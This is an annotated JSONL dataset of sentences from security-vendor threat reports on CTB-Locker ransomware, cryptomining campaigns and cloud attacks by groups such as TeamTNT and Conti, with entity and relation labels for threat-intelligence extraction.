{"id":1,"text":"This post is also available in: 日本語 (Japanese) CTB-Locker is a well-known ransomware Trojan used by crimeware groups to encrypt files on the victim's endpoints and demand ransom payment to decrypt the files back to their original state, but most antiviruses detect it by mistake as CryptoLocker (only one vendor correctly detects it as CTB-Locker).","entities":[{"id":45800,"label":"malware","start_offset":288,"end_offset":300},{"id":45801,"label":"malware","start_offset":53,"end_offset":63},{"id":45802,"label":"malware","start_offset":342,"end_offset":352}],"relations":[],"Comments":[]} {"id":2,"text":"The attack vector is very basic and repeats itself: It begins with a spear phishing email sent with SCR attachments (double zipped).","entities":[{"id":48941,"label":"attack-pattern","start_offset":69,"end_offset":115}],"relations":[],"Comments":[]} {"id":3,"text":"Once executed by the user the first stage malware downloads and executes the ransomware from a fixed hardcoded server list.","entities":[],"relations":[],"Comments":[]} {"id":4,"text":" The first known campaign was launched by Crimeware on November 2014.","entities":[{"id":45806,"label":"TIME","start_offset":55,"end_offset":68},{"id":48942,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} {"id":5,"text":"The first stage downloaded the ransomware from these sites:","entities":[],"relations":[],"Comments":[]} {"id":6,"text":" A very serious campaign was launched between January 19, 2015 and January 20, 2015, and Palo Alto Networks Enterprise Security Platform has discovered more than 1000 unique attacks since.","entities":[{"id":22,"label":"identity","start_offset":90,"end_offset":108},{"id":44570,"label":"TIME","start_offset":46,"end_offset":62},{"id":44571,"label":"TIME","start_offset":67,"end_offset":83}],"relations":[],"Comments":[]} {"id":7,"text":"The attacker used a polymorphic malware builder to generate malware with a unique hash for each victim, preventing signature-based solutions from detecting the new attacks before it was too late for the victim.","entities":[],"relations":[],"Comments":[]} {"id":8,"text":"This tactic is a nightmare for legacy security products that are based on legacy techniques such as bytes signatures, since they can only detect attacks after the damage is done instead of preventing it as a true solution should.","entities":[],"relations":[],"Comments":[]} {"id":9,"text":" Palo Alto Networks Enterprise Security Platform offers multilayer protection to prevent this attack along with other attacks without the need for prior knowledge of the specific attack.","entities":[{"id":31,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":10,"text":" We can see here that server hostnames were changed but they didn’t change the server IP address – see the attached file with results for files from last week’s campaign from VirusTotal.","entities":[{"id":45807,"label":"SOFTWARE","start_offset":175,"end_offset":185}],"relations":[],"Comments":[]} {"id":11,"text":"Most legacy security programs could not detect this malware at the time it was posted.","entities":[],"relations":[],"Comments":[]} {"id":12,"text":"If you re-test these hashes again from last week you can see an average of 49\/57 engines that detect last week’s threat – but that’s too little, too late for anyone who already lost data.","entities":[],"relations":[],"Comments":[]} {"id":13,"text":" This campaign started earlier today, and the malware uses the same techniques and even the same IOCs: And only added two new hostnames:","entities":[{"id":45808,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} {"id":14,"text":" By now you shouldn’t be surprised that one of them is on the same known malicious IP address.","entities":[],"relations":[],"Comments":[]} {"id":15,"text":"We found 147 new unique pieces of malware today alone, two of them fully undetectable by the legacy security solutions in VirusTotal and most of them barely detected by one vendor (few have 4\/57 detection rate).","entities":[{"id":44574,"label":"SOFTWARE","start_offset":122,"end_offset":132}],"relations":[],"Comments":[]} {"id":16,"text":"See below:","entities":[],"relations":[],"Comments":[]} {"id":17,"text":" So basically you have two choices:","entities":[],"relations":[],"Comments":[]} {"id":18,"text":" The most surprising fact about this campaign is that almost all the IOCs haven’t been changed: For those still using legacy solutions we’ve attached two lists of SHA256 hashes in a text file format for reference.","entities":[],"relations":[],"Comments":[]} {"id":19,"text":"One list shows the new campaign, which continues to progress.","entities":[],"relations":[],"Comments":[]} {"id":20,"text":"The other list is of last week’s campaign by the same attackers (exhaustive or close to it). Palo Alto Networks Enterprise Security Platform would have stopped this ransomware attack campaign thanks to the platform’s unique integration between the network, endpoint and the cloud to maximize security.","entities":[{"id":45809,"label":"identity","start_offset":94,"end_offset":112}],"relations":[],"Comments":[]} {"id":21,"text":"Attacks aren't getting any less sophisticated, so it is time to leave legacy security solutions behind and upgrade to real, prevention-based security.","entities":[],"relations":[],"Comments":[]} {"id":22,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":23,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":24,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":25,"text":"This post is also available in: 日本語 (Japanese) Over the past six months, we’ve seen a major increase in the number of attack campaigns with the ultimate goal of mining cryptocurrency.","entities":[],"relations":[],"Comments":[]} {"id":26,"text":"It’s a subject Unit 42 has been tracking in the past year:","entities":[{"id":45810,"label":"identity","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} {"id":27,"text":" So, what is driving a widespread shift from attackers and creating a significant trend in the industry?","entities":[],"relations":[],"Comments":[]} {"id":28,"text":"There are three factors at work:","entities":[],"relations":[],"Comments":[]} {"id":29,"text":" To answer the question in more detail, it’s important to put yourself into the criminal’s shoes and consider what alternative routes they have to monetize infections.","entities":[],"relations":[],"Comments":[]} {"id":30,"text":"In this brief, we’ll share how this trend came to fruition, why it’s so prevalent, and how security professionals and defenders can keep an eye out for this rising type of threat.","entities":[],"relations":[],"Comments":[]} {"id":31,"text":" How Attacks Monetize Infections","entities":[],"relations":[],"Comments":[]} {"id":32,"text":"While targeted attacks gain the most attention from researchers and media, the majority of malware infections are untargeted and even indiscriminate.","entities":[],"relations":[],"Comments":[]} {"id":33,"text":"Instead of seeking out specific targets, many criminals aim to infect as many systems as possible and then turn those infections into cash.","entities":[],"relations":[],"Comments":[]} {"id":34,"text":"This has been true for over a decade, although the mechanisms available to criminals have shifted in that time.","entities":[],"relations":[],"Comments":[]} {"id":35,"text":"To understand where we are now, it helps to look at how we got here, and to look at the evolution of common cybercriminal activities.","entities":[],"relations":[],"Comments":[]} {"id":36,"text":"Back in the early 2000s, some of the earliest “botnet herders” made their income by relaying spam emails through infected computers.","entities":[{"id":45768,"label":"attack-pattern","start_offset":93,"end_offset":104},{"id":44575,"label":"TIME","start_offset":12,"end_offset":23}],"relations":[],"Comments":[]} {"id":37,"text":"Over time, that business became less profitable due to anti-spam controls and ISPs preventing infected systems from directly relaying emails.","entities":[],"relations":[],"Comments":[]} {"id":38,"text":"In the mid-2000s, criminals made great profits from using Banking Trojans to steal credentials for online banking websites, and subsequently draining the accounts’ associated funds.","entities":[{"id":45811,"label":"TIME","start_offset":7,"end_offset":16},{"id":45812,"label":"attack-pattern","start_offset":77,"end_offset":94}],"relations":[],"Comments":[]} {"id":39,"text":"This account takeover activity continues today, but various anti-fraud measures and law enforcement actions have made it less profitable and riskier for criminals.","entities":[],"relations":[],"Comments":[]} {"id":40,"text":"Another aspect of Banking Trojan infections is that, while the criminal may be infecting hosts indiscriminately, the value of the host greatly depends on the individual who owns it, and the criminals’ ability to “cash out” their bank account.","entities":[],"relations":[],"Comments":[]} {"id":41,"text":"Figure 1 is a capture from a book I wrote with some colleagues in 2008, “Cyber Fraud: Tactics, Techniques, and Procedures.”","entities":[{"id":51804,"label":"TIME","start_offset":66,"end_offset":70}],"relations":[],"Comments":[]} {"id":42,"text":"It shows the price that a criminal enterprise called IFRAME DOLLARS was charging to infect computers in various countries at that time.","entities":[{"id":44577,"label":"threat-actor","start_offset":53,"end_offset":67}],"relations":[],"Comments":[]} {"id":43,"text":"Figure 1: Capture from Cyber Fraud: Tactics, Techniques, and Procedures showing prices of host infections by country.","entities":[],"relations":[],"Comments":[]} {"id":44,"text":"In 2007, the infection of a system in Australia went for US$0.60, while an infection in Poland was only a fraction of the cost, at US$0.096.","entities":[{"id":45814,"label":"location","start_offset":38,"end_offset":48},{"id":45815,"label":"location","start_offset":88,"end_offset":94},{"id":45813,"label":"TIME","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} {"id":45,"text":"The difference in price represented the difference in value: criminals were able to make more money through a Banking Trojan account takeover from an Australian infection than they could in Poland.","entities":[{"id":45771,"label":"malware","start_offset":110,"end_offset":124},{"id":45772,"label":"attack-pattern","start_offset":125,"end_offset":141},{"id":44579,"label":"location","start_offset":190,"end_offset":196},{"id":44580,"label":"location","start_offset":150,"end_offset":160}],"relations":[],"Comments":[]} {"id":47,"text":"As anti-fraud protections evolved, so did the criminals.","entities":[],"relations":[],"Comments":[]} {"id":48,"text":"Fast forward five years to 2013 and the rise of the Ransomware business model","entities":[{"id":44581,"label":"TIME","start_offset":27,"end_offset":31}],"relations":[],"Comments":[]} {"id":49,"text":"This new way to generate profit had two major advantages over account takeovers: ","entities":[],"relations":[],"Comments":[]} {"id":50,"text":"Put another way, the ransomware model represented both increased efficiency and decreased risk in monetizing the infection.","entities":[],"relations":[],"Comments":[]} {"id":51,"text":"Anyone who’s been paying attention to cybercrime since 2013 is aware of the ransomware surge, infecting systems throughout the world and plaguing networks’ administrators.","entities":[{"id":44582,"label":"TIME","start_offset":55,"end_offset":59}],"relations":[],"Comments":[]} {"id":52,"text":"While only a tiny fraction (possibly 1 in 1000) of systems infected with a banking Trojan pay out for attackers, a much higher portion of ransomware victims pay to get their files back.","entities":[],"relations":[],"Comments":[]} {"id":53,"text":"While US$300 payments are less than a single account takeover could return, ransomware makes greater returns due to the volume and decreased risk in this new business model.","entities":[],"relations":[],"Comments":[]} {"id":54,"text":"Cybercriminals have become good business people: they saw the benefits and embraced the change.","entities":[],"relations":[],"Comments":[]} {"id":55,"text":"Enter “The Bubble” – Where We Are Now","entities":[],"relations":[],"Comments":[]} {"id":56,"text":"In the last two years, but particularly in the last six months, the price of bitcoin and other cryptocurrencies experienced a massive price surge with respect to the U.S. dollar and other fiat currencies.","entities":[],"relations":[],"Comments":[]} {"id":57,"text":"Here’s the chart for bitcoin over the last two years, showing a rise of 2,000% to 4,000% in the versus the U.S. dollar.","entities":[{"id":44585,"label":"SOFTWARE","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} {"id":58,"text":"Figure 2: Price of bitcoin in U.S. dollars from CoinMarketCap While botnets mining cryptocurrency is nothing new, the technique was much less profitable than using ransomware.","entities":[{"id":45817,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":45818,"label":"SOFTWARE","start_offset":48,"end_offset":60}],"relations":[],"Comments":[]} {"id":59,"text":"In fact, with the rise of specialized bitcoin mining hardware, no regular PC can make any significant amount of money for an attacker.","entities":[],"relations":[],"Comments":[]} {"id":60,"text":"However, there are many other “crypto coins” in the market today.","entities":[],"relations":[],"Comments":[]} {"id":61,"text":"The one we see mined most by attackers is called Monero.","entities":[{"id":45819,"label":"SOFTWARE","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} {"id":62,"text":"In contrast to bitcoin, Monero was designed to enable private transactions using a closed ledger, and its mining algorithm is still mined effectively by both PC CPUs and GPUs.","entities":[{"id":45820,"label":"SOFTWARE","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} {"id":63,"text":"As the chart below shows, Monero has risen even faster than bitcoin in price in the last two years, with more than a 30,000% gain in U.S. dollars.","entities":[{"id":45773,"label":"TIME","start_offset":84,"end_offset":98},{"id":44583,"label":"SOFTWARE","start_offset":26,"end_offset":32},{"id":44584,"label":"SOFTWARE","start_offset":60,"end_offset":67}],"relations":[],"Comments":[]} {"id":64,"text":"Figure 3: Price of Monero in U.S. dollars from CoinMarketCap ","entities":[{"id":45821,"label":"SOFTWARE","start_offset":19,"end_offset":25},{"id":45823,"label":"SOFTWARE","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} {"id":65,"text":"A normal PC used to mine Monero can earn around US$0.25 per day at the current prices.","entities":[{"id":45824,"label":"SOFTWARE","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} {"id":66,"text":"That number is small, but it’s important to note that it doesn’t matter what country or network a Monero miner is part of: computers in Australia and Poland mine at the same speed.","entities":[{"id":44586,"label":"SOFTWARE","start_offset":98,"end_offset":104},{"id":44587,"label":"location","start_offset":136,"end_offset":145},{"id":44588,"label":"location","start_offset":150,"end_offset":156}],"relations":[],"Comments":[]} {"id":67,"text":"Every infected system is a profit-generating resource when mining Monero, and users are much less likely to identify their infection and remove the mining program than they would be with ransomware.","entities":[{"id":45825,"label":"SOFTWARE","start_offset":66,"end_offset":72}],"relations":[],"Comments":[]} {"id":68,"text":"For context, in January, we found a Monero mining campaign that infected around 15 million systems, largely in the developing world.","entities":[{"id":45827,"label":"SOFTWARE","start_offset":36,"end_offset":42},{"id":45826,"label":"TIME","start_offset":16,"end_offset":23},{"id":45828,"label":"location","start_offset":115,"end_offset":131}],"relations":[],"Comments":[]} {"id":69,"text":"If these systems remained infected for at least 24 hours each, the attackers could have earned well over 3 million U.S. dollars in Monero.","entities":[{"id":260,"label":"TIME","start_offset":39,"end_offset":56},{"id":44589,"label":"SOFTWARE","start_offset":131,"end_offset":137}],"relations":[],"Comments":[]} {"id":70,"text":"Additionally, the risk of arrest and conviction is significantly lower than with ransomware, as mining cryptocurrency is less likely to generate reports to law enforcement than a data-destroying ransomware infection.","entities":[],"relations":[],"Comments":[]} {"id":71,"text":" What’s Next?","entities":[],"relations":[],"Comments":[]} {"id":72,"text":"This wave of attacks will continue as long as it maintains a high level of profitability with a low level of risk for cybercriminals.","entities":[],"relations":[],"Comments":[]} {"id":73,"text":"For defenders, it’s important to note that the techniques used to infect systems with coin mining malware are the same as they were for ransomware.","entities":[],"relations":[],"Comments":[]} {"id":74,"text":"Infections typically begin with emails carrying malicious macro documents, drive-by exploit kits targeting browsers, or direct attacks on servers running vulnerable software.","entities":[],"relations":[],"Comments":[]} {"id":75,"text":"There is no single solution to stopping these attacks, but the same technologies and policies you use to prevent other malware infections will be effective.","entities":[{"id":44590,"label":"attack-pattern","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} {"id":76,"text":"Across the changing landscape of botnet herders, Banking Trojans, ransomware and coin mining is one constant: the business-savvy drive to maximize profit and reduce risk.","entities":[],"relations":[],"Comments":[]} {"id":77,"text":"Using these as our guide, we can make sense of where we are today, how we got here, and be prepared for what has yet to develop in the future.","entities":[],"relations":[],"Comments":[]} {"id":78,"text":"Here are three things to watch for:","entities":[],"relations":[],"Comments":[]} {"id":79,"text":"1. A marked increase in the price of Monero or other cryptocurrencies will draw even more attackers into this business.","entities":[{"id":45829,"label":"SOFTWARE","start_offset":37,"end_offset":43}],"relations":[],"Comments":[]} {"id":80,"text":"For many users, this could actually be a positive development, as the negative impact of having resources sapped from one’s computer is much less than paying a ransom or restoring your system from a backup due to ransomware.","entities":[],"relations":[],"Comments":[]} {"id":81,"text":"Conversely, a crash in the price of cryptocurrencies will decrease the profitability and drive criminals back to ransomware.","entities":[],"relations":[],"Comments":[]} {"id":82,"text":"2. Listen to your fans or keep an eye on your CPU usage.","entities":[],"relations":[],"Comments":[]} {"id":83,"text":"Many users realize their system is infected with coin mining malware when their laptop fans kick into high-speed mode to keep the overtaxed CPU cool.","entities":[],"relations":[],"Comments":[]} {"id":84,"text":"Listening to fans won’t work at the enterprise scale, but implementing widespread CPU performance monitoring could be a good way to find compromised devices.","entities":[],"relations":[],"Comments":[]} {"id":85,"text":"This will also help you identify the coin mining “insider threat,” as misguided administrators may see their organizations’ unused CPU time as a way to generate personal income.","entities":[],"relations":[],"Comments":[]} {"id":86,"text":"3. Criminals will find ways to target these attacks.","entities":[],"relations":[],"Comments":[]} {"id":87,"text":"Compromising a user’s browser or a regular home PC will net the criminal an average system for mining coins, but higher-end systems will generate more income.","entities":[{"id":45830,"label":"attack-pattern","start_offset":0,"end_offset":29}],"relations":[],"Comments":[]} {"id":88,"text":"Attackers will soon begin targeting devices with higher specifications to get more bang for their buck.","entities":[],"relations":[],"Comments":[]} {"id":89,"text":"Gaming PCs with high-end GPUs and servers with large numbers of processing cores will be prime targets.","entities":[],"relations":[],"Comments":[]} {"id":90,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":91,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":92,"text":"It’s that time of year again – our researchers have analyzed and reviewed the threats and attacks that occurred during the first half of 2021.","entities":[{"id":45831,"label":"TIME","start_offset":123,"end_offset":141}],"relations":[],"Comments":[]} {"id":93,"text":"Our report, Attacks From All Angles: 2021 Midyear Security Roundup, highlights many of the active attacks we saw, from APTs to ransomware to zero-day exploits.","entities":[{"id":44591,"label":"TIME","start_offset":37,"end_offset":49},{"id":44592,"label":"attack-pattern","start_offset":141,"end_offset":158}],"relations":[],"Comments":[]} {"id":94,"text":"I’d like to highlight an area where we are seeing increased activity: attacks against cloud infrastructures.","entities":[],"relations":[],"Comments":[]} {"id":95,"text":"I’ve spoken on this at a few events and asked my audiences how many have active cloud infrastructure projects going on, the answer is always most of them.","entities":[],"relations":[],"Comments":[]} {"id":96,"text":"In our 1H’ 2021 Cyber Risk Index, we asked organizations what their top infrastructure risks are.","entities":[{"id":45832,"label":"identity","start_offset":16,"end_offset":32},{"id":44593,"label":"TIME","start_offset":7,"end_offset":15}],"relations":[],"Comments":[]} {"id":97,"text":"Cloud security has been in the top two for the last few years.","entities":[],"relations":[],"Comments":[]} {"id":98,"text":"Obviously, many organizations are moving quickly to the cloud and, as such, need to be thinking about how to secure it.","entities":[],"relations":[],"Comments":[]} {"id":99,"text":"Below is an overview of what we’re seeing in cloud attacks.","entities":[],"relations":[],"Comments":[]} {"id":100,"text":" Threats Impacting Cloud Environments","entities":[],"relations":[],"Comments":[]} {"id":101,"text":"In our first half report, we highlight an APT group named TeamTNT that has been targeting clouds for quite a while now.","entities":[{"id":45833,"label":"threat-actor","start_offset":58,"end_offset":65}],"relations":[],"Comments":[]} {"id":102,"text":"They have focused most of their efforts on planting crypto-mining malware on cloud servers in an effort to mine Monero coins, but we have also seen them utilize DDoS IRC bots, steal cloud account credentials, and exfil data.","entities":[{"id":44594,"label":"SOFTWARE","start_offset":112,"end_offset":118},{"id":44595,"label":"attack-pattern","start_offset":161,"end_offset":165},{"id":44596,"label":"attack-pattern","start_offset":176,"end_offset":207},{"id":44597,"label":"attack-pattern","start_offset":213,"end_offset":223},{"id":44598,"label":"malware","start_offset":52,"end_offset":73}],"relations":[],"Comments":[]} {"id":103,"text":"As you can see from the above diagram, all of these are end goals for most attacks.","entities":[],"relations":[],"Comments":[]} {"id":104,"text":"Speaking of data exfil, in the first half we saw APT actors utilize cloud-based file storage to exfiltrate their stolen data.","entities":[],"relations":[],"Comments":[]} {"id":105,"text":"For example, we found that Conti operators use the cloud storage synchronization tool Rclone to upload files to the Mega cloud storage service.","entities":[{"id":377,"label":"malware","start_offset":116,"end_offset":120},{"id":44599,"label":"threat-actor","start_offset":27,"end_offset":42},{"id":44600,"label":"tools","start_offset":86,"end_offset":92},{"id":44601,"label":"SOFTWARE","start_offset":116,"end_offset":142}],"relations":[{"id":1,"from_id":44599,"to_id":44600,"type":"uses"},{"id":2,"from_id":44600,"to_id":44601,"type":"exfiltrates-to"},{"id":3,"from_id":44599,"to_id":44601,"type":"exfiltrates-to"}],"Comments":[]} {"id":106,"text":"Similarly, DarkSide operators used Mega client for exfiltrating files to cloud storage, 7-Zip for archiving, and PuTTY application for network file transfers.","entities":[{"id":45834,"label":"threat-actor","start_offset":11,"end_offset":29},{"id":45835,"label":"tools","start_offset":35,"end_offset":46},{"id":45836,"label":"tools","start_offset":88,"end_offset":93},{"id":45837,"label":"tools","start_offset":113,"end_offset":118}],"relations":[{"id":120,"from_id":45834,"to_id":45835,"type":"uses"},{"id":121,"from_id":45834,"to_id":45836,"type":"uses"},{"id":122,"from_id":45834,"to_id":45837,"type":"uses"}],"Comments":[]} {"id":107,"text":"This use of known, legitimate tools is not new; we call that “living off the land” and have seen this tactic pick up recently, including usage by ransomware actors.","entities":[{"id":45838,"label":"tools","start_offset":62,"end_offset":81}],"relations":[],"Comments":[]} {"id":108,"text":"Many organizations now need to look at ways of monitoring legitimate tools usage within their networks to identify any malicious uses.","entities":[],"relations":[],"Comments":[]} {"id":109,"text":"Cloud Security Architecture","entities":[],"relations":[],"Comments":[]} {"id":110,"text":"When developing your cloud security architecture and strategy, it is important to always keep the ends in mind.","entities":[],"relations":[],"Comments":[]} {"id":111,"text":"In this case, what are the motivation and end goals of an attacker?","entities":[],"relations":[],"Comments":[]} {"id":112,"text":"As you see in the image above, most cloud attacks are going to fall into one of these areas.","entities":[],"relations":[],"Comments":[]} {"id":113,"text":"Depending on what you are doing as part of your cloud infrastructure, you should be able to identify if any or all of these end goals could be targeted in your environment.","entities":[],"relations":[],"Comments":[]} {"id":114,"text":"From there, you can work backwards to develop your strategy for protecting those initial access areas tied to the different attacks.","entities":[],"relations":[],"Comments":[]} {"id":115,"text":"A challenge many organizations face is that the cloud isn’t simple, and many of the technologies that make up the cloud are new, with new features being deployed all the time.","entities":[],"relations":[],"Comments":[]} {"id":116,"text":"Understanding how these work and – more importantly – how to secure them can be very difficult.","entities":[],"relations":[],"Comments":[]} {"id":117,"text":"Utilizing a security platform approach can help build your cloud to be more secure, but educating your architects and administrators will also help.","entities":[],"relations":[],"Comments":[]} {"id":118,"text":"One key area is hardening your cloud account credentials, as these will be regularly targeted by malicious actors.","entities":[],"relations":[],"Comments":[]} {"id":119,"text":"Using multi-factor authentication to access all accounts can minimize this risk tremendously.","entities":[],"relations":[],"Comments":[]} {"id":120,"text":"Take a look at Trend Micro Cloud One, part of our complete cybersecurity platform, to learn more.","entities":[{"id":44602,"label":"SOFTWARE","start_offset":15,"end_offset":36}],"relations":[],"Comments":[]} {"id":121,"text":"The cloud is only one aspect of our full 1H 2021 report.","entities":[{"id":45839,"label":"TIME","start_offset":41,"end_offset":48}],"relations":[],"Comments":[]} {"id":122,"text":"To get more details on all the different threats and attacks we observed, download and read the full report here.","entities":[],"relations":[],"Comments":[]} {"id":123,"text":" Tags Cloud | Cyber Crime | Expert Perspective | Cyber Threats | APT & Targeted Attacks | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":124,"text":"Cybercriminals have embraced the anonymous nature of cryptocurrency as a new preferred method of profit.","entities":[],"relations":[],"Comments":[]} {"id":125,"text":"Unit 42 released details about attackers hijacking web browsers to mine for compute resources and exchange for cryptocurrency.","entities":[{"id":45840,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":126,"text":"With the increasing value of cryptocurrency, such as bitcoin and Ethereum, and a better business model with higher returns than malware- and exploit-type attacks, it’s no surprise these types of attacks are becoming more commonplace.","entities":[{"id":44603,"label":"SOFTWARE","start_offset":53,"end_offset":60},{"id":44604,"label":"SOFTWARE","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} {"id":127,"text":" Cybercriminals will compromise a website and abuse a legitimate tool on that site to gain access to the compute resources of site visitors’ systems.","entities":[{"id":45842,"label":"attack-pattern","start_offset":46,"end_offset":69},{"id":45841,"label":"attack-pattern","start_offset":21,"end_offset":41}],"relations":[],"Comments":[]} {"id":128,"text":"Using this access, attackers will essentially steal compute resources and exchange them for cryptocurrency credit.","entities":[{"id":45843,"label":"attack-pattern","start_offset":46,"end_offset":69}],"relations":[],"Comments":[]} {"id":129,"text":"This all occurs without the users’ consent or knowledge throughout the duration of their site visits.","entities":[],"relations":[],"Comments":[]} {"id":130,"text":" The malicious activity itself doesn’t cause long-term damage to systems, and ends as soon as users leave the malicious or compromised site.","entities":[],"relations":[],"Comments":[]} {"id":131,"text":"Additionally, the site will still provide users with its normal, intended functionality.","entities":[],"relations":[],"Comments":[]} {"id":132,"text":"However, users likely experience a noticeable slowdown in system performance.","entities":[],"relations":[],"Comments":[]} {"id":133,"text":" If you believe your system is being affected by this type of attack, leaving the site or closing your browser will, in most cases, end the attack.","entities":[],"relations":[],"Comments":[]} {"id":134,"text":"Additionally, you should practice good cybersecurity hygiene.","entities":[],"relations":[],"Comments":[]} {"id":135,"text":"This means avoiding unfamiliar websites, clicking on links or downloading attachments from unknown email senders, keeping products updated with the latest security patches, enabling multi-factor authentication, and using reputable security products.","entities":[],"relations":[],"Comments":[]} {"id":136,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":137,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":138,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":139,"text":"In our updated report on ransomware from Unit 42, “Ransomware: Unlocking the Lucrative Criminal Business Model,” Unit 42 researcher Bryan Lee notes: “In 2016, it was thought that there were less than one hundred active ransomware variants out in the wild.","entities":[{"id":45846,"label":"identity","start_offset":41,"end_offset":48},{"id":45847,"label":"TIME","start_offset":153,"end_offset":157},{"id":45844,"label":"identity","start_offset":113,"end_offset":120},{"id":45845,"label":"identity","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} {"id":140,"text":"Today, the number of total ransomware variants at least over 150, if not hundreds more.” It’s reasonable to ask why ransomware continues not only to exist but to thrive.","entities":[],"relations":[],"Comments":[]} {"id":141,"text":"The first answer to this, as we’ve outlined in our report, is that ransomware is a lucrative cybercriminal business model.","entities":[],"relations":[],"Comments":[]} {"id":142,"text":"However, in addition to the human factor, there are technical reasons.","entities":[],"relations":[],"Comments":[]} {"id":143,"text":"Specifically, there are three things that combine to make ransomware a particularly potent threat on the technical level:","entities":[],"relations":[],"Comments":[]} {"id":144,"text":" In some ways, these three points state the obvious.","entities":[],"relations":[],"Comments":[]} {"id":145,"text":"But the full ramifications and why these make ransomware hard to stop aren’t always discussed.","entities":[],"relations":[],"Comments":[]} {"id":146,"text":" The way ransomware works is well documented, but let’s recap here.","entities":[],"relations":[],"Comments":[]} {"id":147,"text":"Ransomware is downloaded to a user’s system and executed on it.","entities":[],"relations":[],"Comments":[]} {"id":148,"text":"The way the attackers get the ransomware on the system varies: it can be through unpatched vulnerabilities, social engineering or both.","entities":[],"relations":[],"Comments":[]} {"id":149,"text":"The most common way ransomware operators levy attacks is through email or by web browsing to malicious or compromised sites.","entities":[{"id":45848,"label":"attack-pattern","start_offset":65,"end_offset":123}],"relations":[],"Comments":[]} {"id":150,"text":"The overwhelming majority of ransomware attacks are against Microsoft Windows systems.","entities":[{"id":44606,"label":"SOFTWARE","start_offset":60,"end_offset":77}],"relations":[],"Comments":[]} {"id":151,"text":"Once malware is running on the user’s system, it seeks out and encrypts files and folders that hold information critical for the user, such as documents, business applications or even database files.","entities":[],"relations":[],"Comments":[]} {"id":152,"text":"In some cases, the ransomware is sophisticated enough to target specific application files.","entities":[],"relations":[],"Comments":[]} {"id":153,"text":"Most importantly, because the ransomware is executing with the compromised user’s privileges, any file the legitimate, now-compromised user has access to, including network shares and backups, is fair game for the ransomware.","entities":[{"id":44607,"label":"attack-pattern","start_offset":63,"end_offset":92}],"relations":[],"Comments":[]} {"id":154,"text":" It’s this last point that gets to the heart of why ransomware is so potent.","entities":[],"relations":[],"Comments":[]} {"id":155,"text":"From an operating system point of view, the ransomware IS the user.","entities":[],"relations":[],"Comments":[]} {"id":156,"text":"Even though Microsoft Windows today features a robust user access control system, that system has inherent limitations.","entities":[{"id":44608,"label":"SOFTWARE","start_offset":12,"end_offset":29}],"relations":[],"Comments":[]} {"id":157,"text":"In the early days of Window Vista, Microsoft enabled aggressive security checking to ensure user-initiated actions were legitimate.","entities":[{"id":45849,"label":"SOFTWARE","start_offset":21,"end_offset":33},{"id":45850,"label":"identity","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} {"id":158,"text":"This was well-intentioned but ultimately backfired: users got fed up clicking “Are you sure?” dialog boxes and quickly disabled the feature, or just mindlessly clicked “OK” every time they saw it.","entities":[],"relations":[],"Comments":[]} {"id":159,"text":"Microsoft made reasonable adjustments so that these alerts are now raised sparingly.","entities":[{"id":44609,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":160,"text":"Although that feature was never enabled to protect user data files like ransomware targets, there is a clear lesson from the experience: too many security checks on user activity fails in the end.","entities":[],"relations":[],"Comments":[]} {"id":161,"text":" Bringing that lesson to bear here, the only way the operating system could protect against ransomware would be to raise “Are you sure?” dialog boxes on everyday operations against the kinds of files that ransomware targets.","entities":[],"relations":[],"Comments":[]} {"id":162,"text":" And this is where the second point comes to bear.","entities":[],"relations":[],"Comments":[]} {"id":163,"text":" Unlike other forms of malware, ransomware is very specific in its targeting.","entities":[],"relations":[],"Comments":[]} {"id":164,"text":"It goes after the files users are most likely to care about.","entities":[],"relations":[],"Comments":[]} {"id":165,"text":"These also happen to be files users are most likely to use on a day-to-day basis or that are critical to an organization’s operations.","entities":[],"relations":[],"Comments":[]} {"id":166,"text":"Extra layers of protection for those files would be incredibly onerous.","entities":[],"relations":[],"Comments":[]} {"id":167,"text":"Imagine having to click through “Are you sure?” dialog boxes for every document or picture you opened in a day.","entities":[],"relations":[],"Comments":[]} {"id":168,"text":" From an engineering point of view, this sole, specific targeting of files that matter significantly increases the chances of ransomware’s success.","entities":[],"relations":[],"Comments":[]} {"id":169,"text":"This brings us to the third point: there is little attack time wasted on files that don’t matter to the victim.","entities":[],"relations":[],"Comments":[]} {"id":170,"text":"Even a successful ransomware attack that is halted early by security software will achieve some level of damage – enough to make the victim consider paying the ransom to get the files back.","entities":[],"relations":[],"Comments":[]} {"id":171,"text":"If user32.dll were encrypted and unusable, it would be a problem.","entities":[{"id":44610,"label":"FILEPATH","start_offset":3,"end_offset":13}],"relations":[],"Comments":[]} {"id":172,"text":"But when your organization’s overall accounting and audit report is inaccessible right before the big deadline, that’s catastrophic.","entities":[],"relations":[],"Comments":[]} {"id":173,"text":" The net of these three points is that 